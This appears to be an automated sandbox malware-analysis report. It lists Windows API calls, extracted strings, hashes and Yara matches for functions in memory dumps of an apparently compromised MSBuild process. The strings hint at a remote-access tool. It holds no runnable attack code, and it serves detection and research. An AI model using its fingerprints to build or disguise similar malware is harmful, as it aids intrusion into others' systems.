                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseCreateValue
                                                                                                                                            • String ID: pth_unenc$BG
                                                                                                                                            • API String ID: 1818849710-2233081382
                                                                                                                                            • Opcode ID: ac20c6f818266d456b173dad8d641fd48acc3e355ae729c9f48089b2aa064521
                                                                                                                                            • Instruction ID: fff2d7bcc465bc574364a4979b4b77ba115ffea085319746951fe37a0eeb78e5
                                                                                                                                            • Opcode Fuzzy Hash: ac20c6f818266d456b173dad8d641fd48acc3e355ae729c9f48089b2aa064521
                                                                                                                                            • Instruction Fuzzy Hash: 9FF0CD31500218BBDF109FA0ED46EEF37ACAB40B50F104539F902A60A1E675DB14DAA4
                                                                                                                                            Function 00404AB1 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,004745A8,00414DB5,00000000,00000000,00000001), ref: 00404AED
                                                                                                                                            • SetEvent.KERNEL32(00000284), ref: 00404AF9
                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00404B04
                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00404B0D
                                                                                                                                              • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                                                                                            • String ID: KeepAlive | Disabled
                                                                                                                                            • API String ID: 2993684571-305739064
                                                                                                                                            • Opcode ID: 526203e9eca74a7ac11616e6de4b704dd5e98db1e732fd16a6fd45517b5b1fbb
                                                                                                                                            • Instruction ID: d6da77504ed7f85403cc54e6f32b3900d2337039667ff8d97479a9328fe4a552
                                                                                                                                            • Opcode Fuzzy Hash: 526203e9eca74a7ac11616e6de4b704dd5e98db1e732fd16a6fd45517b5b1fbb
                                                                                                                                            • Instruction Fuzzy Hash: F8F0BBB19043007FDB1137759D0E66B7F58AB46325F00457FF892926F1DA38D890875B
                                                                                                                                            Function 0041BE6F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041BF02), ref: 0041BE79
                                                                                                                                            • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF02), ref: 0041BE86
                                                                                                                                            • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041BF02), ref: 0041BE93
                                                                                                                                            • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF02), ref: 0041BEA6
                                                                                                                                            Strings
                                                                                                                                            • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041BE99
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                                                                                                            • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                                                                                                            • API String ID: 3024135584-2418719853
                                                                                                                                            • Opcode ID: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
                                                                                                                                            • Instruction ID: 2ebb83c1e7e70c4501562f07591cf8b091918c9767bda4cb27a2f29097fd03e7
                                                                                                                                            • Opcode Fuzzy Hash: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
                                                                                                                                            • Instruction Fuzzy Hash: C7E04F62104348ABD31437F5BC8ECAB3B7CE784613B100536F612903D3EA7484448A79
                                                                                                                                            Function 00401430 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 7libraryloaderCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 0040143A
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00401441
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                                            • String ID: GetCursorInfo$User32.dll$`v
                                                                                                                                            • API String ID: 1646373207-4169404581
                                                                                                                                            • Opcode ID: f39e1638c21b7beb4c7105e5daed03b820dcbd0345c10e5d325762a4e30a7452
                                                                                                                                            • Instruction ID: fea3bfcfa5ad703f85b7dd8d5f3eac54d033561bc9bd2fc33d3800e380b32b62
                                                                                                                                            • Opcode Fuzzy Hash: f39e1638c21b7beb4c7105e5daed03b820dcbd0345c10e5d325762a4e30a7452
                                                                                                                                            • Instruction Fuzzy Hash: 51B092B868A3059BC7306BE0BD0EA093B24EA44703B1000B2F087C12A1EB7880809A6E
                                                                                                                                            Function 0040E6A3 Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                                                                                                              • Part of subcall function 0041B15B: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B173
                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E6C1
                                                                                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 0040E6E5
                                                                                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E6F4
                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040E8AB
                                                                                                                                              • Part of subcall function 0041B187: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040E4D0,00000000,?,?,00474358), ref: 0041B19C
                                                                                                                                              • Part of subcall function 0041B187: IsWow64Process.KERNEL32(00000000,?,?,?,00474358), ref: 0041B1A7
                                                                                                                                              • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                                                                                                              • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                                                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E89C
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2180151492-0
                                                                                                                                            • Opcode ID: 38b7cc1bcac48a295481161db252efa9018639b129d0edbffe131367ad8f1267
                                                                                                                                            • Instruction ID: 1ccfc3ca83e07eb3b8bade3b71d1bee95701cef3987deea6625860c00c24977f
                                                                                                                                            • Opcode Fuzzy Hash: 38b7cc1bcac48a295481161db252efa9018639b129d0edbffe131367ad8f1267
                                                                                                                                            • Instruction Fuzzy Hash: F641E1311083415BC325F761D8A1AEFB7E9EFA4305F50453EF84A931E1EF389A49C65A
                                                                                                                                            Function 10007153 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetEnvironmentStringsW.KERNEL32 ref: 1000715C
                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000717F
                                                                                                                                              • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 100071A5
                                                                                                                                            • _free.LIBCMT ref: 100071B8
                                                                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 100071C7
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3638136028.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3638101142.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3638136028.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_10000000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 336800556-0
                                                                                                                                            • Opcode ID: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                                                                                                            • Instruction ID: fdf90bdbf822fabaf3dd9d310e80898d5fc59248e37e3ebe61ec6e18e74c85b1
                                                                                                                                            • Opcode Fuzzy Hash: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                                                                                                            • Instruction Fuzzy Hash: 6601D872A01225BB73129BBE5C8CDBF2A6DFBC69E0311012AFD0CC7288DB658C0181B0
                                                                                                                                            Function 0044E13B Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetEnvironmentStringsW.KERNEL32 ref: 0044E144
                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044E167
                                                                                                                                              • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044E18D
                                                                                                                                            • _free.LIBCMT ref: 0044E1A0
                                                                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044E1AF
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 336800556-0
                                                                                                                                            • Opcode ID: 4bdc18aade4f5afa9f676aa8b8aa9a2318643a84ce2148a0478020116eae0cde
                                                                                                                                            • Instruction ID: 38685928f53d0fdec7f9771a1fbcf5508afe04d06d5fe5a1692e2fd93afee85f
                                                                                                                                            • Opcode Fuzzy Hash: 4bdc18aade4f5afa9f676aa8b8aa9a2318643a84ce2148a0478020116eae0cde
                                                                                                                                            • Instruction Fuzzy Hash: 8201B1726417117F73215ABB6C8CC7B6A6DEEC2BA2315013ABD04D6201DA788C0291B9
                                                                                                                                            Function 10005B7A Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000000,1000636D,10005713,00000000,?,10002249,?,?,10001D66,00000000,?,?,00000000), ref: 10005B7F
                                                                                                                                            • _free.LIBCMT ref: 10005BB4
                                                                                                                                            • _free.LIBCMT ref: 10005BDB
                                                                                                                                            • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BE8
                                                                                                                                            • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BF1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3638136028.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3638101142.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3638136028.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_10000000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast$_free
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3170660625-0
                                                                                                                                            • Opcode ID: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                                                                                                            • Instruction ID: a404960836b3e2f032ab47abdd1028028b52a365ddf0c47563f665e512f3cffd
                                                                                                                                            • Opcode Fuzzy Hash: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                                                                                                            • Instruction Fuzzy Hash: 5501F47A108A52A7F202E7345C85E1F3AAEDBC55F37220025FD19A615EEF73FD024164
                                                                                                                                            Function 00446F43 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetLastError.KERNEL32(0000000A,0000000B,0000000A,00445359,00440A9B,00000000,?,?,?,?,00440C7E,00000000,0000000A,000000FF,0000000A,00000000), ref: 00446F48
                                                                                                                                            • _free.LIBCMT ref: 00446F7D
                                                                                                                                            • _free.LIBCMT ref: 00446FA4
                                                                                                                                            • SetLastError.KERNEL32(00000000,0000000A,00000000), ref: 00446FB1
                                                                                                                                            • SetLastError.KERNEL32(00000000,0000000A,00000000), ref: 00446FBA
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast$_free
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3170660625-0
                                                                                                                                            • Opcode ID: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                                                                                                                                            • Instruction ID: 6bd692df8320938abc1815071491dbd9703328d73d2f54107518a18b095bb187
                                                                                                                                            • Opcode Fuzzy Hash: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                                                                                                                                            • Instruction Fuzzy Hash: 7401D13620C70067F61266757C85D2F266DDBC3B66727013FF958A2292EE2CCC0A452F
                                                                                                                                            Function 0041B37D Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                                                                                                            • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                                                                                                            • GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 0041B3C8
                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3D3
                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3DB
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Process$CloseHandleOpen$FileImageName
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2951400881-0
                                                                                                                                            • Opcode ID: db4a41822c85b6549257f18fa46790b7e5e5d5e6a524df97c50e7420b53bdc77
                                                                                                                                            • Instruction ID: bb9aee54fd4b55ef2446b45ef4d52834339351c189d8e7c886657dc3bd6b5f1d
                                                                                                                                            • Opcode Fuzzy Hash: db4a41822c85b6549257f18fa46790b7e5e5d5e6a524df97c50e7420b53bdc77
                                                                                                                                            • Instruction Fuzzy Hash: 2FF04971204209ABD3106754AC4AFA7B27CDB40B96F000037FA61D22A1FFB4CCC146AE
                                                                                                                                            Function 10001E89 Relevance: 7.5, APIs: 5, Instructions: 41stringCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                                                                                            • lstrcatW.KERNEL32(?,?,?,100010DF,?,?,?,00000000), ref: 10001EAC
                                                                                                                                            • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                                                                                            • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                                                                                            • lstrcatW.KERNEL32(?,100010DF,?,100010DF,?,?,?,00000000), ref: 10001ED3
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3638136028.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3638101142.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3638136028.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_10000000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: lstrlen$lstrcat
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 493641738-0
                                                                                                                                            • Opcode ID: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                                                                                                            • Instruction ID: f5d9027fafc921fe84ae6627056796c55de3fa1ad923a59450c5185d8ca5453c
                                                                                                                                            • Opcode Fuzzy Hash: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                                                                                                            • Instruction Fuzzy Hash: D8F082261002207AF621772AECC5FBF7B7CEFC6AA0F04001AFA0C83194DB54684292B5
                                                                                                                                            Function 100091B8 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • _free.LIBCMT ref: 100091D0
                                                                                                                                              • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                                                                              • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                            • _free.LIBCMT ref: 100091E2
                                                                                                                                            • _free.LIBCMT ref: 100091F4
                                                                                                                                            • _free.LIBCMT ref: 10009206
                                                                                                                                            • _free.LIBCMT ref: 10009218
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3638136028.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3638101142.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3638136028.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_10000000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                            • Opcode ID: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                                                                                                            • Instruction ID: a08e021c65853776c99c3fd86fadada58ae96d962e635c5153d22f52a77de1c5
                                                                                                                                            • Opcode Fuzzy Hash: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                                                                                                            • Instruction Fuzzy Hash: 77F06DB161C650ABE664DB58EAC6C4B7BEDFB003E13608805FC4DD7549CB31FC809A64
                                                                                                                                            Function 0044F79D Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • _free.LIBCMT ref: 0044F7B5
                                                                                                                                              • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                                                                              • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                                                                            • _free.LIBCMT ref: 0044F7C7
                                                                                                                                            • _free.LIBCMT ref: 0044F7D9
                                                                                                                                            • _free.LIBCMT ref: 0044F7EB
                                                                                                                                            • _free.LIBCMT ref: 0044F7FD
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                            • Opcode ID: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                                                                                                            • Instruction ID: 78b16e2cd2bc6e4547488c8f4e3d182d22cf8911186b8f77a4a783cd10448158
                                                                                                                                            • Opcode Fuzzy Hash: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                                                                                                            • Instruction Fuzzy Hash: 9AF01232505600BBE620EB59E8C5C1773E9EB827147A9482BF408F7641CB3DFCC48A6C
                                                                                                                                            Function 10005351 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • _free.LIBCMT ref: 1000536F
                                                                                                                                              • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                                                                              • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                            • _free.LIBCMT ref: 10005381
                                                                                                                                            • _free.LIBCMT ref: 10005394
                                                                                                                                            • _free.LIBCMT ref: 100053A5
                                                                                                                                            • _free.LIBCMT ref: 100053B6
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3638136028.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3638101142.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3638136028.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_10000000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                            • Opcode ID: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                                                                                                            • Instruction ID: ba906e9feca9bc6e71cd1aa5ebacb8f64a9f241ffe6b13fedf7f16c4e4854dfa
                                                                                                                                            • Opcode Fuzzy Hash: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                                                                                                            • Instruction Fuzzy Hash: 38F0F478C18934EBF741DF28ADC140A3BB5F718A91342C15AFC1497279DB36D9429B84
                                                                                                                                            Function 004432E7 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • _free.LIBCMT ref: 00443305
                                                                                                                                              • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                                                                              • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                                                                            • _free.LIBCMT ref: 00443317
                                                                                                                                            • _free.LIBCMT ref: 0044332A
                                                                                                                                            • _free.LIBCMT ref: 0044333B
                                                                                                                                            • _free.LIBCMT ref: 0044334C
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
